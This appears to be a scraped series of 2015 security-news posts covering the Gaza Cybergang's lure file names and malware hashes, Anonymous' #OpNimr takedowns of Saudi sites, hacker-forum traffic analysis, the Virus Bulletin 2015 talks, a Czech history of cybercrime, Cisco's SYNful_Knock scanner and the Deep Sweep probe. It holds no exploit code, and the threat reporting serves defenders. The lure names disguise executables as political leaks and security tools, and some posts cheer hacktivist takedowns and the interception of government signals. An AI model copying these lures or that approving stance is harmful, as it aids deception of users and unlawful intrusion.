File name: بوادر خلاف جديد بين الامارات والسعودية.exe

Translation: Indications of disagreement between Saudi Arabia and UAE.exe


Gaza cybergang, where's your IR team?

Filename: “Wikileaks documents on Sheikh ******* *** *****.exe”


Gaza cybergang, where's your IR team?

File name: صور فاضحـــــة جدا لبعض العسكريين والقضاة والمستشاريين المصريين.exe

Translation: Scandalous pictures of Egyptian militants, judges and consultants

Gaza cybergang, where's your IR team?

File name: -> الرئيس الفلسطيني محمود عباس يشتم ماجد فرج.exe

Translation: President Mahmoud Abbas cursing Majed Faraj.exe

File name: “مكالمة مسربة بين القائد العام للقوات المسلحة المصرية صدقي صبحي.exe”

Translation: Leaked conversation with the Egyptian leader of military forces Sodqi Sobhi.exe

File name: tasreb.rar

IT and IR Malware File Names

VCSExpress.exe Hex.exe
Microsoft Log.exe IMP.exe
Win.exe Corss.exe
WinRAR.exe AVR.exe
ccleaner.exe codeblocks.exe
HelpPane.exe Hex_Workshop_Hex_Editor-o.exe
Help.exe Decoded.exe
vmplayer.exe Decrypted.exe
procexp.exe crashreporter.exe
RE.exe WindowsUpdate.exe
PE.exe AVP.exe
PE-Explorr.exe Kaspersky.exe
PE-Explorr.exe Kaspersky.exe
hworks32.exe Kaspersky Password Manager.exe

Other malware file names

وصية وصور الوالد أتمنى الدعاء له بالرحمة والمغفرة.exe

Military Police less military sexual offenses, drug offenses more.exe


Gaza cybergang, where's your IR team?

IP addresses and domain names used in the attacks

IP addresses
Malware Hashes

302565aec2cd47bb6b62fa398144e0ad f94385be79ed56ef77c961aa6d9eafbf
f6e8e1b239b66632fd77ac5edef7598d a347d25ed2ee07cbfe4baaabc6ff768b
8921bf7c4ff825cb89099ddaa22c8cfd 674dec356cd9d8f24ef0f2ec73aaec88
3bb319214d83dfb8dc1f3c944fb06e3b e20b5b300424fb1ea3c07a31f1279bde
826ab586b412d174b6abb78faa1f3737 42fca7968f6de3904225445312e4e985
5e255a512dd38ffc86a2a4f95c62c13f 3dcb43a83a53a965b40de316c1593bca
058368ede8f3b487768e1beb0070a4b8 e540076f48d7069bacb6d607f2d389d9
62b1e795a10bcd4412483a176df6bc77 699067ce203ab9893943905e5b76f106
39758da17265a07f2370cd04057ea749 11a00d29d583b66bedd8dfe728144850
f54c8a235c5cce30884f07b4a8351ebf d5b63862b8328fb45c3dabdcdf070d0d
9ea2f8acddcd5ac32cfb45d5708b1e1e bc42a09888de8b311f2e9ab0fc966c8c
948d32f3f12b8c7e47a6102ab968f705 c48cba5e50a58dcec3c57c5f7cc3332d
868781bcb4a4dcb1ed493cd353c9e9ab 658f47b30d545498e3895c5aa333ecb1
3c73f34e9119de7789f2c2b9d0ed0440 2b473f1f7c2b2b97f928c1fc497c0650
9dccb01facfbbb69429ef0faf4bc1bda 46cf06848e4d97fb3caa47c17cdd7a9e
4e8cbe3f2cf11d35827194fd016dbd7b 6eb17961e6b06f2472e4518589f66ab9
b4c8ff21441e99f8199b3a8d7e0a61b9 b0f49c2c29d3966125dd322a504799c6
4d0cbb45b47eb95a9d00aba9b0f7daad ca78b173218ad8be863c7e00fec61f2f
18259503e5dfdf9f5c3fc98cdfac6b78 23108c347282ff101a2104bcf54204a8
0b074367862e1b0ae461900c8f8b81b6 76f9443edc9b71b2f2494cff6d4a26a8
Phishing Hashes


#OpNimr Anonymous targets Saudi websites to stop al-Nimr’s crucifixion

#OpNimr – Anonymous targets Saudi websites to protest against a death sentence of crucifixion to a 17-years old for alleged anti government activities.
The popular collective Anonymous has launched the #OpNimr campaign against the Government of Saudi Arabia to protest against it continuous violation of human rights. Anonymous targets Saudi websites is in response to the death sentence handed down to 17-year-old Mohammed al-Nimr.
Earlier in September, the Government has confirmed the Nimr’s sentence of death by crucifixion for alleged anti-government activities in 2012, its execution can now be carried out at any moment.
“Ali al-Nimr is at imminent risk of execution for crimes he said he was tortured to ‘confess’ to. He was 17 years old at the time. ” states Amnesty International
Who is Mohammed al-Nimr?

Ali al-Nimr was sentenced to death on 27 May 2014, when he was only 17 years old, for taking part in demonstrations against the government, attacking the security forces, possessing a machine-gun and armed robbery.

The man is also accused of using a BlackBerry to encourage people to join the protest.

As explained by Amnesty International the Government has based its judgment on confessions extorted under torture. Members of Anonymous have started their campaign calling for Nimr’s release, the hacktivists added that he had been denied a lawyer and confirmed the tortures.

“Campaigners also claim he was forced to sign a confession, which has formed the basis of the case against him … Now, with all legal avenues exhausted, Ali could be crucified at any moment.”
Ali al-Nimr had been arrested on 14 February 2012, when he was 17 years old, and taken to the General Directorate of Investigations (GDI) prison in Dammam, in the Eastern Province. He was not allowed to see his lawyer and has said that GDI officers tortured him to make him sign a “confession”.

Various reports confirm the presence of Nimr at the demonstration, but he was not an activist. Human rights defenders believe that the death sentence of crucifixion is a sort of political “revenge” because Nimr is a nephew of Shia cleric and activist Sheikh Nimr Baqr al-Nimr, who is also facing execution because he gave a speech at anti-government protests in Qatif.

“Ali Mohammed al-Nimr, an innocent young teenage boy has been sentenced to death in Saudi Arabia and we will not stand by and watch,” Anonymous said in a statement directed at Saudi Arabia. “Naturally, the sentence was appealed but the appeal hearing was held in secret and apparently dismissed.”

Anonymous announced its offensive via Twitter, it began #OpNimr by targeting a number of government websites. “

We hope you listen to us this time and release the young man. You will be treated as a virus and we are the cure.”

The list of targets is long and it is available on Paste bin, it includes the Ministry of Justice (, the Ministry of Civil Service (, the General Administration of Education (, PSATRI, Saudi Arabia’s technological center for its military and security sectors (; and even Saudi Airlines ( Currently, most of the sites are back up except for the Ministry of Justice’s.

A full list of targeted websites has been published on Paste bin.

“Hundreds of innocent people die each year because of the Saudi Arabian government and they will now be punished for their actions,” the group’s statement said.

Anonymous is also criticizing the silence of many other governments that seems to be indifferent to the case of al-Nimr, in particular the group of hacktivist is blaming the British Government for its slackness. Anonymous is also criticizing the UN for delegating Saudi Arabia a key “human rights role,” but cases like this one raise many doubts about the conduct of the government in Riyadh.

Do you feel that the crucifixion is tolerable today? How can the West remain indifferent?

“13 Judges have already approved the death sentence of Ali Mohammed al-Nimr meaning only King Salman bin Abdulaziz Al Saud has to approve it. We cannot and will not allow this to happen. The ministry of justice was taken offline a few days ago and we will continue to do this to other government websites.” is the messages of Anonymous to King Salman and the Saudi Arabian Government.

The UN has asked Saudi Arabia to stop the execution, the sentence of crucifixion is inhumane as atrocious, Nimr is set to be beheaded before his body is displayed on a cross in public.

Al nimr stop execution 2

Do you think it right? Do you think it a just punishment to be imposed?

Tracking Hacker Forums with Traffic Analysis

A study conducted by the Intelligence firm RecordedFuture demonstrates the efficiency of the analysis of hacker forums through traffic analysis-like techniques.
Hacker forums still exist, hacking communities are with good shape and growing. Hacker Forums are normally hard to find and once you find them you will see them change again.

Most prolific Hacker forums are mainly located in Russia, China, Brazil and in Arabic countries, so its normal face with the further problem of the language.

Hacker Forums are excellent aggregators, they represent a good place to sell/buy exploit kits, to talk about new vulnerabilities, and to get opinions (but again, you will not be able to understand it).

A study conducted by the Intelligence firm RecordedFuture has analyzed a hacker forum through traffic analysis-like techniques, a technique that resulted effective even if the authors of the research did not had any knowledge about foreign languages used in the hacker forum.

“Analysts can detect patterns in timing, forum participant product and vulnerability, etc. and use this knowledge to determine whether forum participants are a threat. Further, such insights can be used to set up appropriate alerting based on forum activity and help network defenders keep pace with developments around vulnerabilities and exploits.” states the analysis published by Recorded Future.
The data presented in the study was collected over 900 days during which the experts analyzed a Russian hacking forum, the first thing the researchers did was the identification of the principal language used in the forum, it was Russian.

In a second step they focused the analysis on the vulnerability coding, the Common Vulnerabilities and Exposures (CVE), in this way the researchers discovered that the hacker forum was focused mainly on CVE related with Microsoft, Adobe Flash, but surprising Linux was also present most likely because of Shellshock flaw.

Hacker forums

In terms of vulnerabilities, Heartbleed and Shellshock were on the top, but other important vulnerabilities were in the list too, and heavy discussions about it:

Hacker forum analysis 2

“Patch Tuesday … Exploit Wednesday”

The expression “Patch Tuesday … Exploit Wednesday” was referred in a Trend Micro post, back in 2006, and revealed that after the release of new discovered vulnerabilities with Tuesday Microsoft Security Bulletin, a exploit week would start, trying to take advantage of these new discovered vulnerabilities. Nowadays this expression continues to be valid. The next image shows a period starting in March 2013 and ending in September 2015, the blue section is the general forum traffic, the green section is for traffic concerning CVEs and the red one, is related with traffic concerning Microsoft products specifically:

Hacker forum analysis 3

The research provided also interesting info on hackers’ habits, for example, participants to the hacker forums are latecomers in the day, especially when it comes to traffic concerning vulnerabilities. This data reveals that probably the participant have a different job during the entire day.

I strongly suggest you to read the report, the research demonstrated how hacker forums can be analyzed at the message/post-traffic level. This technique is very efficient because frees researchers from the knowledge of the language or tracking individual posts.

“Analysts can detect patterns in timing, spikes in forum participation, mentions of products or vulnerabilities, etc. and use this knowledge to determine whether forum participants are a threat.” states Recorded Future.

About the Author Elsio Pinto

Elsio Pinto is at the moment the Lead Mcafee Security Engineer at Swiss Re, but he also as knowledge in the areas of malware research, forensics, ethical hacking. He had previous experiences in major institutions being the European Parliament one of them. He is a security enthusiast and tries his best to pass his knowledge. He also owns his own blog

Cyber attack overall cost suffered last year by businesses is $315b

A recent survey conducted by Grant Thornton global revealed that one in six businesses have experienced a cyber attack in the past twelve months.
It is always interesting to report findings of studies related to the impact of the cybercrime worldwide, today I want to present you the results of the research conducted by the business advisory firm Grant Thornton International.

Experts at Grant Thornton International interviewed 2500 business leaders in 35 countries discovering that 15% of the surveyed companies have been targeted by attackers over the past 12 months.

According to the findings of the International Business Report (IBR) published by Grant Thornton International, the cyber attacks cost businesses £200bn ($315bn) over the past 12 months.

In line with data provided by other security firms, the financial services sector was most exposed to the risk of cyber-attack. 74% of surveyed leaders confirmed that online attacks are a threat to the business.

“Grant Thornton’s research reveals that the sector most concerned by the threat of a cyber attack is financial services (74% of business say it is a threat) – this is also the sector with the joint-highest recorded instances of cyber crime (26%). At the other end of the spectrum, only 10% of transport firms globally have reported a cyber attack in the past 12 months and just 27% perceive it as a threat.” states Grant Thornton.

Organizations in Europe and North America are privileged targets for hackers, but thanks to a major awareness of cyber threats the estimated loss of business revenues was lower in the EU ($62.3bn) and North America ($61.3bn) than APAC ($81.3bn).

cyber attack loss business revenues Grant Thornton IBR 2015

A successful cyber attack will have a significant impact on the organization with an estimated cost of around 1.2% of business revenues.

“Cyber attacks are an increasingly significant danger for business. Not just cost in a financial sense, but serious reputational damage can be inflicted if attacks undermine customer confidence: just ask Ashley Madison. Despite this, nearly half of firms still lack a strategy to deal with the cyber threat.” said Paul Jacobs, Global Leader of Cyber Security at Grant Thornton.

“Businesses cannot afford to be behind the curve on this threat. Cyber attacks can strike without warning and sometimes without the victim being immediately aware. The pressure from customers and clients cannot be ignored. In this digital age, rigorous security and privacy is expected. If this cannot be guaranteed the ultimate risk is they will simply go elsewhere.”

The principal problem in my opinion is represented by the lack of security strategy in many organizations, only 52% of those surveyed confirmed to have a strategy in place.

The companies lack a strong commitment by the higher management in cyber security and the lack of a proper security posture expose its business to serious risks.

The businesses the most of all are implementing a cyber security strategy are client/customer demand (44%).

Virus Bulletin 2015

At this time of year I’m usually getting ready to travel to Virus Bulletin, maybe the year’s most important conference for an anti-malware researcher. Sadly, for the second year running I’m unable to attend, though it would have been nice to see Prague again – the conference is at the Clarion Congress Hotel – and the networking with other researchers is always an attraction. It’s also something of a milestone in that for the first time since 2007, I don’t have a paper to present there. But maybe 15 VB papers since 1997 is enough for one lifetime. :)
The agenda looks as good as ever, though, with a keynote from Ross Anderson to kick things off.
Other presentations that caught my eye included Does prevalence matter? Ranking anti-malware products by potential victim impact by Microsoft’s Holly Stewart and three of the guys from AV-Comparatives, a Small Talk on The Clean Software Alliance, security, and the future of unwanted behaviours, and a paper on Effectively testing APT defences by Simon Edwards, Richard Ford, and Gabor Szappanos.
And, as most years, there is plenty of representation from my colleagues at ESET. (In the case of papers with more than one author, all authors are listed, but they won’t necessarily all be onstage for the presentation, of course.)
ESET’s Stephen Cobb: Sizing cybercrime: incidents and accidents, hints and allegations
Wednesday 30th September between 12.00 and 12.30 in the Red Room.

Cybercrime certainly feels like a major threat to network security. Criminals routinely use networks to steal data, defraud companies and consumers, and disrupt normal business operation in both public and private sectors. But just how big a threat is cybercrime? For a problem long characterized as both huge and existential by politicians and industry pundits, cybercrime has largely gone unmeasured, if ‘measure’ is taken to mean ‘ascertain the size of the problem using sound scientific methodology’.
This presentation reviews the cybercrime literature, both commercial and academic, for answers as to why we lack reliable, consistent, longitudinal data on the size and scope of the cybercrime problem. The following issues are addressed:
The implications of government failure to measure cybercrime to the extent it measures other crimes.
The problems inherent in outsourcing cybercrime surveys to the private sector.
The three main categories of research deficiency in cybercrime studies.
The inherent complexities of measuring cybercrime.
The implications of weak cybercrime statistics for the information security effort.
The paper concludes with suggestions as to how the current dearth of reliable data may be remedied and a call to action to educate the industry on the appropriate use of available data.
SSL man-in-the-middle secure solution
At the same time, there’s a talk by ESET’s Righard Zwienenberg, Symantec’s Mark Kennedy and Professor Igor Muttik of Intel Security: Wednesday 30 September 12:00 – 12:30, Small Talk.

More and more HTTP traffic is being encrypted (HTTPS). This increases security by preventing listening into the conversation, but it also creates a problem for security products that need access to that information as well. To address this, many security companies implement a ‘man-in-the-middle’ protocol, where they broker the keys from both ends of the conversation, and thus are able to inspect the content.
For some websites now — and perhaps many more in the future — the client is checking to verify that the SSL certificate is routed to the server. However, these checks will fail because the certificate returned by the security product will not match the server’s domain. We see some of these failures in the field today, and more will likely follow.
The IEEE Industry Connections Security Group is working on a secure solution to this growing problem. We will show where we are, and discuss how we will move forward towards an industry solution.
ESET’s Andrew Lee presents in the company of Morton Swimmer of Trend Micro and Nick FitzGerald, nowadays an independent researcher: The Kobayashi Maru dilemma
Wednesday 30 September 15:00 – 15:30, Red room.

How do you win a game when the rules don’t let you?
You change the rules!
In the computer security field, one possible game changer is aggressively fighting back. Star Trek’s fictional James T. Kirk changed the Kobayashi Maru simulation from a no-win situation to one where a winning solution, but can we do the same? What are the ethical and legal challenges?
The dilemma stems from the problem that fighting back will have consequences, sometimes technical, sometimes ethical, sometimes legal. In a world where pointing NMAP at another’s host is considered more than just impolite, using an exploit to gain control of an alleged C&C server, which is probably illegal in most countries anyway, is stepping well over the line. But not changing the rules means we persist in our course of staying one step behind the criminals. This is not satisfactory as it looks like everyone is losing in this scenario – except the criminals.
In this paper we will present various real and hypothetical scenarios of fighting back. For example: sinkholing; SSH honeypots that counter attack (yes, this is real); abusing open directories; hacking C&C servers; taking over botnets by either hijacking the C&Cs or buying them; shutting down DHT-based botnets; modifying phishing pages so they no longer work; using DDoS attacks against criminal infrastructure; and so on. We are not advocating any of these aggressive methods, and what we lay out in the paper is unlikely to be exhaustive. However, we will discuss where we, as the authors, see the boundaries of what we can do so that the readers come away with a better ethical framework for their own activities.
This discussion is long overdue as some mild forms of aggressive defensive tactics have already been tried, and some common daily working activities of security analysts may have potential legal consequences where few currently imagine there might even be ethical considerations. In some cases, the law is in conflict with what may seem like ‘technical common sense’. However, these laws usually have solid foundations and being seen to violate them, even if there are no likely legal consequences, can have negative effects on cooperation with other companies and/or law enforcement agencies, or on public perception. We see this not as a final statement on the matter, but the beginning of a discussion that should accompany our actions in this new frontier.
WaveAtlas: surfing through the landscape of current malware packers
Wednesday 30 September 16:30 – 17:00, Green room.
Joan Calvet ESET
Fanny Lalonde Lévesque École Polytechnique de Montréal
Erwann Traourouder École Polytechnique de Montréal
François Menet École Polytechnique de Montréal
José M. Fernandez École Polytechnique de Montréal
Jean-Yves Marion Université de Lorraine
Obfuscation techniques have become increasingly prevalent in malware programs, employed as tools to thwart reverse engineering efforts or to evade signature-based detection by security products. Among the most popular methods, the use of packers – which are programs that transform an executable file’s appearance without affecting its semantic execution – is now widely adopted by malware authors. However, despite the rise in the number of malicious programs distributed with packers, we still lack a global picture of their current use. What kind of packers protect malware nowadays? Is there a common model? Previous attempts, based on static database-signature tools, failed to build an accurate picture of the use of packers by malware, their main limitation being that static analysis says nothing about the actual behaviour of the packers and, due to its static nature, misses run-time features.
In this paper, we present WaveAtlas, a novel framework designed to map the code used by packers. Using a dynamic analysis approach, it reconstructs in a nutshell the structure of the code modification tree where the root is the packed code and packer, and the nodes represent snippets of code extracted in successive ‘waves’. We report on a large-scale experiment conducted on a representative sample of thousands of pieces of self-modifying malicious code. Our results allowed us to successfully identify common features of malware packers, ranging from their self-modification code usage to exotic choices of machine instructions. In particular, we were able to confirm some commonly held beliefs regarding the use of packers by malware writers. For example, a malicious payload (e.g. code including network callbacks) is typically present in the last or penultimate wave. Furthermore, the number of waves is relatively small and the structure of the trees relatively simple, indicating that malware authors are probably using simpler tools and parameters as a compromise between stealth and efficiency.
ESET’s Marcin Hartung tells you how to Unpack your troubles: .NET packer tricks and countermeasures
Wednesday 30 September 17:00 – 17:30, Green room.

Nowadays, .NET samples are increasingly common, necessitating specialized techniques for processing and analysis, especially when obfuscation is used: .NET packers have many tricks up their sleeves, but fortunately we do too.
A skilled researcher can often glance inside ‘good old-fashioned’ native executables and see what they do despite protection with strong packers. However, .NET files are different.
Analysing clean .NET files with dedicated tools shows us almost everything, but if the file is obfuscated we sometimes see nothing at all. In .NET analysis we face one main obstacle — complex runtime technology which introduces some level of abstraction and therefore makes debugging harder.
This paper combines analysis of methods collected from various sources with techniques originating with the author’s own experience, in order to improve sample management. It describes simple tricks for getting strings after packer decryption or logging APIs used as well as some more sophisticated examples.
All the problems addressed relate to real cases often encountered in the context of commercial packers or of custom protectors used by malware.
Such tricks can be used for single analyses for adding breakpoints in locations of interest or as building blocks for constructing a powerful tool for analysing .NET samples.
Robert Lipovsky and Anton Cherepanov, both from ESET, present their paper Operation Potao Express: analysis of a cyber-espionage toolkit
Thursday 1 October 14:00 – 14:30, Green room.

With the geopolitical situation in Ukraine still in turmoil, targeted cyber-espionage attacks in the country continue to escalate. One of the attacks we analysed in depth last year was BlackEnergy (a.k.a. Sandworm). In 2015, one of the malware families we have been focusing on is another threat mostly active in post-Soviet countries: Potao.
Win32/Potao is a trojan that has recently been used (the most recent attacks were detected in July 2015) to spy on high-value targets such as Ukrainian government and military entities and one of the major Ukrainian news agencies. Other countries targeted by this universal cyber-espionage toolkit include Russia, Georgia and Belarus. In Russia, for example, the malware was used to spy on members of MMM, a popular financial pyramid scheme.
One of the most interesting discoveries during our Potao research was the connection to a Russian version of the popular open-source encryption software TrueCrypt. We discovered a website that has been serving a Russian-language-localized version of the TrueCrypt application that also contains a backdoor, targeting specific targets. In a few cases the trojanized TrueCrypt was used to install the Potao trojan.
In addition to an overview of the attack campaigns using Potao or the trojanized TrueCrypt (detected by ESET as Win32/FakeTC), we will also present the highlights of our detailed technical analysis of both trojans.
Recently, we have released a comprehensive whitepaper with details on our findings. The presentation will supplement a summary of key points already made public with our most recent discoveries, as well as possible links to other malware families and APT groups.
At the same time, ESET’s Lysa Myers and Stephen Cobb start their talk on Personnel shortage and diversity in IT: Is it truly a problem?
Thursday 1 October 14:00 – 15:30, Small Talk.

We’ve all heard horror stories about how little diversity there is in the greater tech field, as well as in InfoSec in particular, a phenomenon often apparent at industry events. But how does our current situation compare with the past? And what can (or should) we do to change that? Is there truly a shortage of candidates for employment in security jobs and if so, can greater diversity help solve that problem.
This presentation looks at multiple aspects of the diversity in tech problem, assessing what has been, and what might be done in the future. For example, we examine trends over time to determine patterns, and look at cyber security job listings to compare them with those in the broader tech industry to see if this provides clues to solving the problem.
Efforts are underway to change the composition of the security industry, making it more inclusive, and this paper provides a look at existing groups and initiatives that focus on supporting minorities in tech and InfoSec careers. We will also offer resources for those seeking to provide mentorship opportunities for students and others seeking to enter this industry.
[Lysa offers a taste of what the talk will cover in a recent blog: Virus Bulletin small talk: Diversity in tech.]
And finally, Olivier Bilodeau presents Linux/Moose endangered or extinct? An update on this atypical embedded Linux botnet
Thursday 1 October 14:30 – 15:00, Green room.

Embedded Linux platforms have been increasingly targeted by malware authors over the past few years. The targeted devices, labelled under the umbrella term ‘Internet of Things’, are generally consumer routers, gateways or modems. They are compromised remotely via brute-forcing of their credentials or being victim of an unpatched vulnerability, such as the infamous Shellshock. Most of these compromises result in the targeted system being assimilated into a botnet.
Recently active examples of embedded Linux botnets include Linux/Aidra, Linux/Dofloo (AES.DDoS), Linux/DNSAmp (Mr.Black), Linux.Gafgyt, Linux/Moose and Linux/Tsunami. Due to the availability of malware source code, several disjoint botnets co-exist; they target several architectures including ARM, MIPS and x86, with variants (or forks) of the threats being common. Of the aforementioned malware list, only Linux/Moose stands out as being one of the rare threats not in the DDoS business, with no x86 variant found and controlled by a single group of actors.
Linux/Moose is built with SOCKS and HTTP proxying capabilities as well as a generic packet sniffer with an exfiltration mechanism. It is used by its operators to commit follow, like and view fraud on social networking sites such as Facebook, Instagram, Twitter and YouTube. It has the ability to spread on its own with a little assistance from its C&C server to provide binaries specific to the victim’s architecture. It targets ARM and MIPS architectures with the latter targeted in both big- and little-endian variants. Additionally, the malware has code to pivot past firewalls and perform NAT traversal to allow attackers to operate from within firewalled networks.
This talk will first describe some of the challenges of reverse engineering embedded malware and analysis. Then we will cover Linux/Moose and the way it was operated. Expanding on the paper we released last spring about this threat, we will give an update on the current status of the botnet and the various means we are using to find its next evolution. To conclude, we will draw some conclusions on whether our publication successfully scared the operators and killed the threat or not.

Kyberzločin: Tady to začalo!

28.9.2015 Kriminalita
Možná je to zvláštní, ale u „počítačového zločinu“ se uvádí jako datum narození rok 1820. Ostatně primitivní (bráno dnešním pohledem, pochopitelně) počítací stroje tu byly už 3 500 let před naším letopočtem v Indii, Japonsku nebo Číně.

Ovšem právě v roce 1820 zničili rozhořčení dělníci tkalcovský stav Josepha-Marie Jacquarda ve Francii: ten jej totiž vybavil automatickým zařízením, které umožnilo opakovat některé jednoduché kroky. Dělníci se báli, že je automat připraví o práci.

Výše uvedený letopočet je ale spíše perličkou než datem počátku kybernetických útoků v pravém slova smyslu. Těm má mnohem blíže rok 1971, kdy americký veterán z Vietnamu John Draper objevil, že píšťalka přikládaná jako dárek ke krabicím s cereáliemi Cap´n Crunch (Kapitán Křup) dokáže vyloudit tón o frekvenci 2 600 Hz.

Co je na tom tak „zločinného“? Přesně tento tón totiž používaly americké telefonní ústředny pro vzájemnou komunikaci: s píšťalkou za pár centů se dalo hvízdáním do sluchátka přepojit z místního (zdarma) na dálkový (placený) hovor, aniž se začal tarifikovat.

Uvádí se, že v některých oblastech USA se s pomocí této píšťalky uskutečnila až čtvrtina hovorů.

Počítače nastupují

Jen dva roky jsme si počkali na první skutečný zločin spáchaný s pomocí počítače: s pomocí počítače, který obsluhoval, a znalosti procesů v bance dokázal na svůj účet převést 1,5 milionu dolarů (přepočteno na dnešní cenovou hladinu je to zhruba šestinásobek).

Dime Savings Bank přitom na nic nepřišla a úředník byl zatčen až poté, co policie začala vyšetřovat nelegální hazard a začala se pídit po tom, jak si mohl se svými příjmy dovolit tak vysoké sázky.

Tento případ se ale řešil jako klasická zpronevěra; počítač byl pouze nástrojem. Až v roce 1981 přišel zločin spáchaný výhradně na počítači, když jistý Ian Murphy na dálku změnil algoritmus výpočtu tarifů v počítačích telekomunikační společnosti AT&T, které pak účtovaly i ve špičce snížené sazby.

Počítače v té době nebyly nikterak chráněné, a zločiny se tak objevovaly jako houby po dešti. Už rok po této modifikaci dosáhly v USA takového rozměru, že je nebylo možné řešit v rámci existujících kompetencí a legislativy a bylo je nutné převést do zodpovědnosti US Secret Service.

V roce 1988 se First National Bank of Chicago stala obětí počítačového útoku, při němž se z banky elektronicky převedlo 70 milionů dolarů. Z nich se později podařilo dohledat 50 milionů. Za spolupodílnictví byli odsouzení čtyři lidé včetně jednoho zaměstnance banky. Má se ale za to, že skupina byla mnohem větší.

V roce 1993 dokázal hacker Kevin Poulsen se svými přáteli pomocí jednoduchého útoku zablokovat téměř všechny telefonní hovory do rozhlasové stanice Kiis v Los Angeles.

„Téměř“ znamená, že ponechali volné jen své linky. Díky tomu v soutěžích vyhráli (jako jediní volající) dva automobily Porsche, několik dovolených a prémii 20 tisíc dolarů.

Poulsen byl odsouzen k pěti letům. V rozhovorech pro média přitom tvrdil, že šlo hlavně o pomstu federálních úřadů, protože objevily odposlouchávání telefonů americkými tajnými službami na ambasádách Číny, Izraele a Jižní Afriky.

Zlatá éra hackingu

Devadesátá léta se obecně stala zlatou érou kybernetické kriminality: firmy houfně přecházely na počítačové systémy, ale nikdo pořádně nevěděl, jak je zabezpečit.

Případy se proto množily jeden za druhým: třeba skupina útočníků kolem ruského hackera Vladimira Levina odcizila z Citibank 10 milionů dolarů (1995) a během několika hodin je dokázala vybrat z bank ve Finsku a Izraeli.

Převod v rámci hodin byl přitom před dvaceti lety neskutečně expresní záležitostí. Policie ovšem tentokrát konala velmi svižně, a tak se téměř všechny peníze kromě necelého půlmilionu podařilo zajistit.

Rok 2000 přinesl ve velkém měřítku renesanci klasického zločinu vydírání. I tentokrát vedly stopy do Ruska, odkud jistá skupina stáhla osobní údaje včetně čísel kreditních karet hudebního maloobchodu Universe. Následně požadovala 100 tisíc dolarů za to, že údaje nezveřejní. Obchod odmítl a útočníci svoji hrozbu splnili.

Poškození reputace firmy bylo tak výrazné, že bezpečnostnímu expertovi Barrymu Schlossbergovi vyplatila částku 1,4 milionu dolarů za to, aby pomohl ruské útočníky vypátrat, vylákat do USA a tady předat policii.

Stalo se tak s pomocí FBI, která založila v Seattle falešnou bezpečnostní startupovou firmu a těm, které potřebovala dostat na americké území, nabízela atraktivní práci. Postup několikrát zopakovala i v dalších případech, než se tato taktika prozradila.

Zneužitá pošta

Do „magického“ roku 2000 se také datují první pokusy o výrazné využití e-mailů a v nich umístěných červů k podvodům. První pokusy proběhly už o rok dříve, ale šlo zatím o nesmělé krůčky.

V roce 2000 se totiž pokoušela varianta červa Iloveyou krást přihlašovací údaje do internetového bankovnictví United Bank of Switzerland.

Zhruba ve stejné době se také výrazně rozšiřují phishingové podvody; ty začaly už ve druhé polovině devadesátých let, ale tehdy útočníci získávali informace jen od zákazníků AOL. Na jejich účet pak nakupovali různé služby. Rozvoj internetového bankovnictví to ovšem změnil.

Zpráva FBI za rok 2005 pak jen stroze konstatuje, že příjmy z kybernetických zločinů svým celosvětovým objemem překročily příjmy obchodu s narkotiky.

Cisco released a tool to scan for SYNful_Knock implants

Talos has developed a Python script for customers to scan their own network to identify routers that may have been compromised by the SYNful_Knock hack.
A couple of weeks ago I published the news of the SYNful_knock security issue involving CISCO routers.

CISCO issued an alert to warn enterprise customers about a spike in attacks in which hackers use valid admin credentials on IOS devices to install bogus ROMMON images, which is the bootstrap program that initializes the CISCO hardware and boot the software. A few days ago, security experts at Mandiant confirmed to have detected such “implants” in the wild, the researchers found the malicious ROMMON images dubbed “SYNful_Knock,” on 14 Cisco routers located in Ukraine, Philippines, India and Mexico. The Cisco models 1841, 2811, 3825 are affected, it is important to highlight that they are no longer being on the market.

SYNful_Knock Details malicious ROMMON 2

SYNful_Knock Details malicious ROMMON 2

Now Cisco has decided to provide a free tool, dubbed SYNful_knock scanner, to allow administrators to test it their routers was running a bogus firmware implanted through the “SYNful_knock” hack.

To administrators need Python 2.7 and the scapy 2.3.1 packet manipulation library in order to launch the tool.

The Cisco Talos security group analyzed the malicious implants that infected a number of its customers and developed a tool to scan a network searching for compromised routers.

“Talos has now developed a tool for customers to scan their own network to identify routers that may have been compromised by this specific malware.” explained William McVey of the Talos Group.
The tool developed by Cisco is able to detect only the currently known version of the malicious implants.

“This tool can only detect hosts responding to the malware ‘knock’ as it is known at a particular point in time … it cannot establish that a network does not have malware that might have evolved to use a different set of signatures.”

To run the tool, you’ll need Python 2.7 and the scapy 2.3.1 packet manipulation library.

Aerospace Probes released to stratosphere for spying weapons

September 27, 2015 By Pierluigi Paganini

A group of hackers is launching aerospace probes in the aim of spying on governments and organizations by collecting signals in the stratosphere.
A group of techies has recently created and tested an aerospace probe, so as to help gather a lot of data deriving from communication, leading to a whole new concept of how we can spy on governments and their weapons. The Critical Engineering group has made their goal public, offering hope to people who have been worried sick of the government and other organizations spying on them, without any option of returning the favor.

The aerospace probe is called the Deep Sweep and it will be used to scan the signals between the ground and stratosphere. In this way, all the signals that would otherwise remain out of reach can now be gathered neatly and used to the benefit of the probe’s holders. For further information on this project, you can click here and have a look at what the techies are saying about their breakthrough.

Aerospace Probes 4

“The three members of a socially motivated movement of technologists known as Critical Engineering have developed and begun testing an “aerospace probe” they call the Deep Sweep. The invention, described in their own detailed writeup, is a 1-foot-diameter acrylic orb packed with radio equipment and attached to a 8.2-foot diameter helium-filled weather balloon.” reported a blog post published by Wired.

Aerospace Probes 2

This is going to be low cost, as well – you can understand why the cost is a definitive factor, to say the least! The whole process of setting up the probe did not exceed $300 and, therefore it is an approachable expense and an investment that is going to attract the interest of many people out there. Using things like radios, antennas, SIM cards and insulated batteries, they have managed to put up something extraordinary.

Up till now, two major launches have taken place and the probe has succeeded partially in its goal.

Aerospace Probes 3

Even though this is certainly an optimistic project and the details are yet to be determined for making it a well-integrated solution, hopefully this gadget is going to help monitor governmental conversations and things like that – offering the same results as those emerging from high-cost gadgets and procedures followed by agencies in the government.

As an innovative idea, the Deep Sweep can be proven extremely helpful. In the near future, even more sophisticated gadgets can be brought to light. So, we ought to look at the aerospace probe with a pinch of salt, but always with the gratitude regarding its inspirational aim!

Yahoo! Launches Free Web Application Security Scanner

Free Web Application Security Scanner
Yahoo! has open-sourced Gryffin – a Web Application Security Scanner – in an aim to improve the safety of the Web for everyone.
Currently in its beta, Project Gryffin has made available on Github under the BSD-style license that Yahoo! has been using for a number of its open-sourced projects.
Gryffin is basically a Go & JavaScript platform that helps system administrators scan URLs for malicious web content and common security vulnerabilities, including SQL Injection and Cross-Site Scripting (XSS).
Yahoo! describes Gryffin as a large-scale Web security scanning platform, which is more than just a scanner, as it is designed to address two specific problems:
